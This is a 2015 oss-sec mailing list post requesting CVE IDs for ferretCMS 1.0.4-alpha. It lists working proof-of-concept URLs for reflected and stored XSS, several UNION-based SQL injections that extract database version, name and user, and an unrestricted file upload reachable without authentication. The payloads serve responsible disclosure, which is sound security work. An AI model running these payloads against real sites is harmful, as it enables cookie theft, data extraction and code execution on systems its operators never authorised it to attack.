oss-sec mailing list archives
CVE-Request -- ferretCMS v.1.0.4-alpha -- Multiple reflecting/stored XSS- and SQLi-vulnerabilities, unrestricted file upload
From: Steffen Rösemann <steffen.roesemann1986 () gmail com>
Date: Fri, 23 Jan 2015 07:14:56 +0100
Hi Josh, Steve, vendors, list. I found multiple reflecting/stored XSS- and SQLi-vulnerabilities as well as an unrestricted file upload in the CMS ferretCMS v.1.0.4 which is currently in the alpha development stage. ============ Reflecting XSS ============ http:// {TARGET}/admin.php?type=search&action=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E ============ Stored XSS ============ 1. via login-form of the administrative backend, input field for username: http://{TARGET}/admin.php executed here in the logevent functionality in the backend: http://{TARGET}/admin.php?type=log&action=read 2. via the new blog-post form, input field for pagetitle: http://{TARGET}/admin.php?type=page&action=insert&p= executed, for example, here: http://{TARGET}/admin.php?type=page&action=read ============ SQLi ============ http:// {TARGET}/admin.php?type=site&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+ http:// {TARGET}/admin.php?type=customkey&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,4+--+ http:// {TARGET}/admin.php?type=account&action=update&p=1+and+1=2+union+select+1,database%28%29,3,4,5,version%28%29,7,8,9+--+ http:// {TARGET}/admin.php?type=plugin&action=update&p=1+and+1=2+union+select+1,database%28%29,version%28%29,4+--+ http:// {TARGET}/admin.php?type=template&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,user%28%29,5+--+ http:// {TARGET}/admin.php?type=permissiongroup&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+ http:// {TARGET}/admin.php?type=page&action=update&p=1+and+substring%28version%28%29,1,1%29=5+--+ ================== Unrestricted file upload ================== An administrator has the opportunity to upload arbitrary files via a form located here on a common ferretCMS installation: http://{TARGET}/admin.php?type=uploader&action=upload As these files aren't renamed and stored in the following location, any unauthenticated user is able to read/execute those files, too: http://{TARGET}/custom/uploads/{NAME_OF_THE_FILE} Could you please assign a CVE-ID / CVE-IDs for these issues. Thank you very much! Greetings. Steffen Rösemann References: [1] https://github.com/JRogaishio/ferretCMS [2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-10.html [3] https://github.com/JRogaishio/ferretCMS/issues/63 [4] https://github.com/sroesemann/ferretCMS [5] http://seclists.org/fulldisclosure/2015/Jan/98 [6] http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-10.html
Current thread:
- CVE-Request -- ferretCMS v.1.0.4-alpha -- Multiple reflecting/stored XSS- and SQLi-vulnerabilities, unrestricted file upload Steffen Rösemann (Jan 22)